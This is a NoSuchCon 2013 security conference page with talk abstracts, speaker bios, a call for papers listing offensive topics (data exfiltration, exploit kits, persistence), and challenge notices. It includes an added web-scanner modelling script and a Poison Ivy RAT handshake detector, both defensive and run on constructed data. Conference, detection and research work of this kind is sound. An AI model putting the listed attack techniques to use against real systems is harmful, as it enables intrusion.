Alexey Osipov, Security tools and PoC developer.
DEFCON Russia speaker
Active participant in bug bounty programs
Professional pentester of web applications
ScadaStrangeLove team member
Juan Perez-Etchegoyen - Transporting evil code into the Business: Attacks on SAP TMS
The largest organizations in the world run their businesses on top of SAP applications. SAP platforms ship with several thousand (!) standard programs, but customers still need to make their own customizations and therefore develop their own code and create their own objects. In order to ensure a rigorous change management process, several layers must be defined and connected: the "environments". All changes and customizations to these critical applications are configured, developed and tested first, and then finally "transported" to the production environment, where employees actually use them to perform the company's business processes.
These different environments are connected and configured through the SAP Transport Management System (TMS). This proprietary component is present in every SAP implementation in the world. However, if the TMS is not secured (it is not by default), a wide range of attacks can be performed, resulting in a complete compromise of the business.
Join us in this brand-new presentation. Through several live demonstrations, you will learn how an attacker can break proprietary protocols, deconstruct obscure file formats and inject rootkits that could result in silent espionage, sabotage and fraud. Finally, you will learn how to protect your own platform from these attacks.
Juan Pablo is the CTO of Onapsis, leading the Research and Development teams that keep the company at the cutting edge of the ERP security field. Juan Pablo is fully involved in the design, research and development of Onapsis' innovative software solutions. Being responsible for managing the Onapsis Research Labs, Juan Pablo has also been actively involved in the coordination and research of critical security vulnerabilities in ERP applications and business-critical infrastructure, such as SAP, Oracle and JD Edwards. Juan Pablo has extensive experience in the information security field, having been involved in large research, penetration testing, vulnerability assessment and security implementation projects, among others.
As a result of his innovative research work, Juan Pablo has been invited to give trainings and presentations at some of the most renowned security conferences in the world, such as BlackHat, HITB and Ekoparty, as well as to host private trainings on different aspects of information security for Global Fortune 100 organizations.
Fabien Duchene, Sanjay Rawat, Jean-Luc Richier, Roland Groz - A hesitation step into the blackbox: Heuristic-based Web-Application Reverse-engineering
Automated black-box scanners alternately reverse-engineer and fuzz web applications to detect vulnerabilities. It is established that the knowledge they acquire about such applications plays a key role in their ability to exhibit vulnerabilities. In this paper we adapt a method to automatically reverse-engineer web applications. Three heuristics drive this process. Empirical experiments show that our method obtains more precise knowledge of the application than state-of-the-art tools, which also increases vulnerability detection capability.
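To make concrete what "knowledge of the application" means for a black-box scanner, here is an added example (not the authors' method or their three heuristics) that learns a crude navigation model from an HTTP trace: pages are abstracted to their tag skeleton and form field names so that pages differing only in text collapse into one state, and every (state, submitted inputs) pair is mapped to the states it was observed to lead to. The trace is constructed.

```python
"""Page-model inference for black-box web scanning.

Added example for this page. It is a generic illustration of the problem
the paper addresses (learning what a web application looks like before
fuzzing it), not the authors' heuristics. The HTTP trace is constructed.
"""
from collections import defaultdict
from html.parser import HTMLParser


class _Skeleton(HTMLParser):
    """Reduce a page to its tag structure plus form actions and input names,
    dropping text so that 'Welcome alice' and 'Welcome bob' become one state."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and "name" in a:
            self.parts.append(f"input[{a['name']}]")
        elif tag == "form":
            self.parts.append(f"form[{a.get('action', '')}]")
        else:
            self.parts.append(tag)

    def handle_endtag(self, tag):
        self.parts.append("/" + tag)


def page_signature(html: str) -> str:
    """Abstract state identifier for a response page."""
    p = _Skeleton()
    p.feed(html)
    return " ".join(p.parts)


def build_model(trace):
    """trace: iterable of (page_html_before, submitted_params, page_html_after).
    Returns {state: {frozenset(param names): {next_state, ...}}}, i.e. which
    inputs, sent from which state, were seen to reach which states."""
    model = defaultdict(lambda: defaultdict(set))
    for before, params, after in trace:
        model[page_signature(before)][frozenset(params)].add(page_signature(after))
    return model


def states(model):
    """All distinct states the scanner now knows about (sources and targets)."""
    found = set(model)
    for transitions in model.values():
        for targets in transitions.values():
            found |= targets
    return found


# --- constructed trace ------------------------------------------------------
LOGIN = ('<html><body><form action="/login"><input name="user">'
         '<input name="pw"></form></body></html>')
ERR_ALICE = ('<html><body><p class="err">Bad password for alice</p>'
             '<form action="/login"><input name="user"><input name="pw">'
             '</form></body></html>')
ERR_BOB = ERR_ALICE.replace("alice", "bob")
HOME = '<html><body><h1>Welcome alice</h1><a href="/logout">logout</a></body></html>'

SAMPLE_TRACE = [
    (LOGIN, {"user": "alice", "pw": "x"}, ERR_ALICE),
    (LOGIN, {"user": "bob", "pw": "y"}, ERR_BOB),
    (LOGIN, {"user": "alice", "pw": "s3cret"}, HOME),
    (ERR_ALICE, {"user": "alice", "pw": "s3cret"}, HOME),
]
```

With this model a fuzzer knows that the login form has two observable outcomes and that the error page is just the login page with a message, so it can spend its budget on inputs that change state instead of re-fuzzing the same page under a different greeting. Real tools refine the abstraction (and that is where heuristics such as the paper's come in); the skeleton here is the simplest one that works on the sample.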
Fabien Duchene is a PhD student at LIG Lab, University of Grenoble, France. His current research focuses on evolutionary fuzzing to improve vulnerability detection in black-box (not grey-box!) harnessing. He created the GreHack hardcore security conference. Previously, he worked at Microsoft, and later on at Sogeti-ESEC. He holds an MSc in Computer Science from the "Grande Ecole" Ensimag, France.
Itzik Kotler - Pythonect-Fu: From Function to Language
A domain-specific language (DSL) is a computer language that targets a particular kind of problem, rather than a general-purpose language that aims at any kind of software problem. The main benefit of a DSL is that it lets you focus on the business problem rather than on the details of the programming platform. Many security domains, such as malware analysis, penetration testing and forensics, could benefit from a DSL that would provide quicker prototyping and testing. So how difficult is it to develop a domain-specific language? Piece of cake. Meet Pythonect, a new, free and open source dataflow programming language that lets you take your favorite already-existing Python functions and turn them into a DSL. This talk will introduce Pythonect, its features, its DSL capabilities, and a couple of security-oriented DSLs written in Pythonect.
Itzik Kotler has been doing Information Security for well over 12 years and is currently an independent consultant. Before that, he was the Chief Technology Officer at Security Art. Previously, Itzik was the Security Operation Center Team Leader at Radware and the Lead Security Researcher at Safend. Itzik speaks regularly at Blackhat, DefCon, Hack In The Box and other conferences. Additionally, he founded and organizes the Tel-Aviv DefCon (DC9723) meetup group, and is a member of the Standards Institution of Israel (SII) Committee on Information Security.
Robinson Delaugerre & Adrien Chevalier - Killing RATs, the Arsenic Framework
With all this talk about APTs and Little Chinese Hackers All Up In Your Network, we aim to bring a little sanity into what the public believes is the incident response world. With the Arsenic Framework, we bring together reverse engineering, network analysis and host analysis to give people the power to investigate their own network. In this talk, we'll demonstrate the effectiveness of our toolchain on the activity of an old RAT (Poison Ivy) as captured in an enterprise network, from network detection to complete removal, and even going all hacking-back with a way to exploit some known vulnerabilities on the C2 server. By releasing this framework, we aim to do the heavy lifting for incident responders and provide them with a collaborative workspace where every specialist can do their share, giving network admins a way to fight effectively against known RATs and encouraging collaboration amongst security experts to finally provide an effective defense against tools used by APT actors.
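A flow-level detector for the Poison Ivy session start, as an added example that is not part of the Arsenic Framework. It encodes the commonly cited handshake shape, a 256-byte encrypted client blob answered by a 256-byte server blob, and treats those constants as an assumption to validate against real captures; port 3460 is the tool's documented default but is configurable, so the check keys on payload shape rather than port. The flow records are constructed.

```python
"""Flow-level heuristic for the Poison Ivy RAT handshake.

Added example for this page, not part of the Arsenic Framework. Assumption:
a Poison Ivy client opens its session with a 256-byte encrypted blob and the
controller answers with another 256-byte blob (the shape commonly described
for this RAT). Validate the constants against your own captures. The flow
records below are constructed.
"""
import math
import random
from dataclasses import dataclass


@dataclass
class Flow:
    src: str
    dst: str
    dport: int
    client_first: bytes   # first client-to-server TCP payload
    server_first: bytes   # first server-to-client TCP payload


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: roughly 4-5 for text, close to 8 for ciphertext."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def looks_like_poison_ivy(flow: Flow, min_entropy: float = 6.0) -> bool:
    """Both first payloads are exactly 256 bytes and neither looks like
    plaintext. min_entropy is a tuning knob, not a protocol constant."""
    return (
        len(flow.client_first) == 256
        and len(flow.server_first) == 256
        and shannon_entropy(flow.client_first) >= min_entropy
        and shannon_entropy(flow.server_first) >= min_entropy
    )


def suspicious_flows(flows):
    """Flows worth pulling the full session for, e.g. to confirm with the
    RAT's password/key and decrypt the command channel."""
    return [f for f in flows if looks_like_poison_ivy(f)]


# --- constructed sample traffic --------------------------------------------
_rng = random.Random(1337)
_HTTP = b"GET /index.html HTTP/1.1\r\nHost: intranet.example\r\n\r\n"


def _random_blob(n: int) -> bytes:
    """Stand-in for an encrypted handshake blob (deterministic for the demo)."""
    return bytes(_rng.getrandbits(8) for _ in range(n))


SAMPLE_FLOWS = [
    # benign web request: text payloads, wrong lengths
    Flow("10.0.0.5", "10.0.0.80", 80, _HTTP, b"HTTP/1.1 200 OK\r\n\r\n<html>"),
    # right lengths, but plaintext: should not fire even on the default port
    Flow("10.0.0.6", "203.0.113.9", 3460, (_HTTP * 8)[:256], (_HTTP * 8)[:256]),
    # handshake-shaped exchange on a non-default port: should fire
    Flow("10.0.0.7", "198.51.100.2", 443, _random_blob(256), _random_blob(256)),
]
```

The point of the shape-based test is that it survives a port change and a renamed binary; what it does not survive is a controller that pads or splits its first packets, so treat a hit as a trigger for host analysis and session decryption rather than as a verdict.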
Robinson was raised by wolves and only got his hands on a computer when he was 19. By then, he singlehandedly defeated an army of Armenian hackers who tried to get all of his bases. He had a particular set of skills that came in handy. Having found his vocation, he started working in IT security, and has been doing so for a little less than five years, bringing together his passion for jerking off in front of a screen and telling people what to do. He's currently an evangelist on Twitter, and not a bitch at what he does for a living.
Adrien learned to read in binary, and by the age of twelve he knew how to write JMPs in assembler, but not how to communicate with people who didn't use PEP8. He was an unpaid worker for the Ministry of Defense, and is now France's biggest buyer of bleach, to be applied directly to the eyes, daily. He lately found sanity in a job where you don't sleep, or eat, or get paid, unless you own some boxes. Needless to say he sleeps a lot, and lost a whole bunch of money when Greece defaulted. Since then, he uses Lent as an excuse not to eat döners.
*******************************************************************************
PARENTAL ADVISORY: 100% technical content
*******************************************************************************

NoSuchCon 2013
NoSuchCon - CFP 2.0
** http://nosuchcon.org **
15-17 May 2013 / Paris / France

The US have the NSA, hackers have the NSC.

--[ Synopsis:

The first edition of the NoSuchCon conference will take place in Paris from May the 15th to May the 17th of 2013. NSC is the badass hardcore technical security conference. Of death.

--[ Background:

We think hacking is a science, not an art. It's largely the science of experimentation and self-learning. Best effort is not enough anymore. The number of hackers reaching the level where they can actually discover things by themselves has never been so high. And at the same time, the signal-to-noise ratio in our traditional communication channels (IRC, mailing lists, conferences, informal gatherings...) has never been so low. So we thought we might give it a shot: we're trying to build a 0% bullsh!t conference.

It's tougher than one might expect, but with the help of many (see in particular the support from our hardcore Programming Committee of death), we are confident that passion will prevail and that we'll eventually learn something from each other :)

If you're tired of people making money on your back by monetizing your research whenever you go to a conference, we have good news: we're 100% non-profit. We're also not affiliated with any .gov or .com or any other organization. We work hard at night. Our aim is to learn stuff. If this sounds a lot like your own life, we'd be happy to have you among us.

It's also worth remembering that hacking is *not* a competition. As such, there is no winner or rockstar. All you'll find here is people experimenting and seeking truth in code and RFCs.

Finally, we'd like to insist on respect. Respect among attendees of course, which goes without saying (we all share the same passion; let's not get into ego problems and instead let's learn from each other. You know deep inside yourself that even though *you* certainly did your part of hard work, there would be no computers or networks without the help of many), but also for researchers who come over, often from very far away, to present months of late-night work to their peers. This is why NSC is strictly single track: every talk that makes it in deserves to be attended, and everyone deserves to be treated with equal esteem and respect. There's no such thing as a rockstar at NSC: if you're after fame and profit, we're sure you'll find many other places to go to these days.

--[ Press people / Media / Media Analysts / Bloggers:

NSC is not a top secret conference. You are welcome to come over and participate. NSC staff will do their best to make your job easier. Please bear in mind that you'll have to comply with strict hacker ethics, particularly in terms of privacy, personality rights and respect for the anonymity of people who do not want to appear in your publications: you cannot take pictures of people without their *prior* consent, and people do not *have to* answer any question if they don't feel like it.

--[ Venue:

The NSC conference will be hosted in the French Communist Party's amazing headquarters. This astonishing building was designed by the recently deceased Brazilian architect Oscar Niemeyer. The address is:

Espace Oscar Niemeyer - Siege du Parti Communiste
2 Place Colonel Fabien, 75019 Paris, France

--[ Tickets/Pricing:

Tickets will be available for sale within days via our main website.

  l33t sponsor ticket       1337 EUR
  Evil sponsor ticket        666 EUR
  Regular on-site ticket     300 EUR
  Regular online ticket      250 EUR
  Early bird ticket 2        200 EUR  (before 2013/04/30)
  Early bird ticket          150 EUR  (before 2013/04/01)
  Student ticket              50 EUR  (50 tickets available)

--[ Quality:

The aim of NSC is best summarized in 3 words: quality, quality and research. That, and hard work! We believe that there is a place for quality independent security research disclosure. We think that this place should be run on a non-profit basis. We do our best to ensure that the chosen talks are of the utmost quality thanks to the highly respected security researchers who form our selection panel. As a result, we hope to deliver in a 3-day single-track conference some seriously disruptive food for thought to security enthusiasts. Whether you will like a given talk or not depends on several factors involving your personal interests... and your general appetite for security ;) That being said, we totally think that every talk selected for NSC deserves the attention of the entire audience. We therefore do stick to a single track format. That's a kind of respect for speakers. As a speaker, it doesn't mean you have to lower the bar of your talk. It's rather the opposite: this is intended to cut down the number of "fillers", not-so-sexy talks. We actually encourage highly technical talks, and writing code is somewhat compulsory (...unless you are better at soldering and have an electronic solver!). Don't assume ridiculous prerequisites, but assume people grasp new concepts quickly (isn't that what hacking is all about really?).

--[ Disclosure policy:

We consider researchers as outstanding grown adults. We therefore impose on them the following disclosure policy: DO WHAT YOU WANT.

--[ Programming Committee:

The programming committee plays a central role in ensuring the best talks make it to the conference. We are very humbled to have such a great team of cool and remarkable engineers giving a bit of their free time to help us build a decent conference:

  Alex Ionescu (CrowdStrike) @aionescu
  Andrewg (felinemenace)
  Ange Albertini (Corkami) @angealbertini
  Nemo (felinemenace)
  Daniel Hodson (felinemenace/Ruxcon)
  Aaron Portnoy (Exodus Intelligence) @aaronportnoy
  Piotr Bania @PiotrBania
  Bannedit (Corelan) @bannedit0
  Carlos Sarraute (Grandata)
  Cesar Cerrudo (IOActive) @cesarcer
  Dhillon Kannabhiran (HackInTheBox) @hackinthebox
  Nico Waisman (Immunity) @nicowaisman
  Federico Kirschbaum (Ekoparty) @fede_k
  FX (Phenoelit) @41414141
  Fyodor Yarochkin (Academia Sinica/Plurk) @fygrave
  Hugo Fortier (RECon) @hugofortier
  Itzik Kotler @itzikkotler
  Jason Martin (Shakacon) @shakacon
  joernchen (Phenoelit) @joernchen
  Jonathan Brossard (Toucan System) @endrazine
  Julio Auto (iSIGHT Partners) @julioauto
  Tarjei Mandt (Azimuth) @kernelpool
  Laurent Gaffie (Spiderlabs) @laurentgaffie
  Lurene Grenier (Immunity) @pusscat
  Matthieu Suiche @msuiche
  Nicolas Ruff (EADS Innovation Works) @newsoft
  Pipacs (Linux Kernel Page Exec Protection)
  corelanc0d3r @corelanc0d3r
  Ravishankar Borgaonkar (Berlin University) @raviborgaonkar
  Rodrigo Branco "BSDaemon" (Cipher) @bsdaemon
  Sergey Bratus (Dartmouth College) @sergeybratus
  Silvio Cesare (Deakin University) @silviocesare
  The Grugq (Coseinc) @thegrugq
  Tim Kornau (Google)
  Travis Goodspeed @travisgoodspeed

Note: thanks heaps, we owe you dear PC members :)

--[ Submitting:

We are interested in world domination 2013. We are glad you are willing to contribute. We highly encourage and will favour presentations with demos. To assess the depth, novelty and relevance of submitted talks, we will require a 2 to 3 page whitepaper (as an order of magnitude...) along with your submission. We know it's a lot of work for speakers, but we'll help you get to Paris: it's not too bad a deal ;)

We are only accepting submissions in English. The standard format will be a 35 min presentation + 10 min Q&A. If you think your talk deserves more time, feel free to ask for two slots (that is an extended talk: 80 min + 10 min Q&A). Please note that any talk whose content is judged commercial or not vendor-neutral will be rejected and/or interrupted on stage.

General topics of interest are mostly offensive and include:
  - Security problems that are not fixable,
  - finding vulnerabilities and/or proving security properties of software,
  - new exploitation techniques (new classes of bugs, heap overflows on different memory allocators, win8...), proving things on binaries,
  - bytecode vulnerability discovery and exploitation (java, .NET, python...),
  - reverse engineering, writing debuggers,
  - exploit automation (targeted/worms),
  - malware engineering,
  - security assessment of new network protocols,
  - hardware hacking (raspberry based automated network hacking?),
  - routers hacking,
  - crypto: practical assessment of software, quantum computers, FPGA and hardware implementations,
  - BYOD for dummies: ARM/x86 android/iOS hacking, persistence, remote control...
  - Botnets, Exploit kits and how to use them for targeted attacks,
  - Anti forensics: piercing network firewalls and proxies, persistence, automated network ripping, data exfiltration, hiding your data from the CIA,
  - owning corporate and government networks for ever,
  - defeating new security protections,
  - breaking out of hypervisors,
  - hardware level vulnerabilities (cpu bugs?),
  - Hacking UEFI & Secure Boot (Bootkitting UEFI, Bitlocker...),
  - GNU Radio/SDR/any kind of wireless hacking, Signal Processing,
  - Hacking web application frameworks (java, ruby, php, .NET,...),
  - Be god on the internet, walk on water,
  - break stuff.

We highly encourage any hardcore technical topics not listed in the above!!

Submit your presentation and materials and the below form via e-mail to email@example.com

-----8X---------------8X-----------8X----------------
[ CFP ANSWER TEMPLATE ]

*** General information:
  * Speakers name or alias
  * Demo [Y/N]
  * Number of lines of code written during your project?
  * I need help with visas [Y/N]
  * Presentation Title
  * Abstract
  * Biography
  * E-mail address
  * Address
  * Phone number
  * Company (name) or Independent?
  * additional requirements: Internet? Others?

*** Talk Format:
Please choose your talk format:
  [ ] Standard (30min+10min Q&A)
  or:
  [ ] Extended (80min+10min Q&A)

*** Attachments:
Specify if your submission contains any of the following information:
  * Tool [Y/N]
  * Slides [Y/N]
Please attach your whitepaper to your submission in one of the following formats: raw ASCII 7-bit text, TeX file, PDF file, MS Office or Open Office document or presentation. (No other formats will be accepted: target your 0days ;)).
-----8X---------------8X-----------8X----------------

--[ Deadlines:

The CFP closes on March the 31st, 2013. The earlier you submit, the better for all of us ;) You shall be notified of your acceptance as a speaker by the 15th of April, 2013.

--[ Do I want to talk there anyway?

It's up to you mate. If you like the things we like, you may as well like the conference. You may want to have a look at the 3 previous editions of HES we co-organized and see if it looks like something of interest to you. We absolutely do encourage you to submit if you have something interesting to say. In particular, academic researchers, hobbyists, or just regular security enthusiasts of any age and from all over the internet are welcome to submit.

--[ Speaker benefits:

  4 nights accommodation in Paris,
  Travel reimbursement (up to $1000),
  Much respect and love.

--[ More information:

  Web site: http://www.nosuchcon.org/
  Twitter: @NoSuchCon
  Facebook: https://www.facebook.com/NoSuchCon
  CFP information/submissions: firstname.lastname@example.org

--[ Greetings:

The No Such Association (NSA) team would like to thank the security research community for its continuous support. We would like to thank in particular members of the Programming Committee, the past speakers, all of the volunteers as well as all the attendees and the past sponsors, plus the countless friends, that share our passion and are ready to share some of their time with us :)

--[ EOF ]--
Winners of the Oppida-NSC challenge!
Florent Marceau - 23 April - 10:05 - Hack In The Box Amsterdam 2014 (www.hitb.org) pass + hotel + flight!
Fabien Perigaud - 24 April - 11:28
Jurriaan "skier" Bremer - 25 April - 15:51
Pierre "peio" Petit - 28 April - 18:43
X-N2O - 5 May - 11:25 - Samsung Galaxy Tab 2 16GB
Outside the competition (after the deadline)
Axel "0vercl0k" Souchet - 26 May - http://0vercl0k.tuxfamily.org/bl0g/?p=253
kutio - 30 May - http://kutioo.blogspot.fr/2013/05/nosuchcon-2013-challenge-write-up-and.html
All winners also received a USB missile launcher.
The Wargame @NSC2013!
North Korea has launched a cyber operations training facility.
Your job, as one of the trainees, is to impress the facility's staff with your skills by capturing as many points as possible.
The facility has several servers, which you can reach by first logging in to kishi with SSH.
More info will be on the kishi website at: http://kishi.labs.overthewire.org/
This website will only be accessible from the conference for now.
The first edition of the Oppida-NSC challenge @NSC2013!
The challenge is available here (password: Oppida_NSC_Challenge) and ends on the 16th of May at 00:00 GMT+1. It consists of a 32-bit Windows application that you will be able to download as soon as the challenge starts.
You will need to find a valid name/serial combination and send it to challenge2013 (at) oppida.fr as soon as possible!
Details of your analysis must be provided within one week after the solution.
The "supr3me 31337" winner will be the first to provide a solution (a detailed analysis is still required).
The next 10 solutions received after the first one will participate in a /dev/urandom draw.
"Supr3me 31337" prize:
A Hack In The Box Amsterdam 2014 (www.hitb.org) pass + hotel + flight! (1)
HITB is one of the most respected security conferences in Europe; Oppida is inviting you to this wonderful event next year!
A job offer as the next North Korea supreme leader! (2)
The following people are not allowed to participate: the NSC staff, Oppida employees, Justin Bieber, Lady Gaga.
By participating in the challenge you agree that your name, solution, and detailed analysis may be published on any media the NSC committee deems appropriate.
Winners will need to provide a valid ID/passport in order to receive their gift.
Both English and French are OK for solutions and analysis details.
The challenge is not open to teams; only individuals are allowed to apply.
The full contest rules are available here
(1) Maximum total value: 2400€ VAT included.
(2) Could be replaced by a Samsung Galaxy Tab 2 16GB if the position is not available (yet).
This year's challenge is provided by Oppida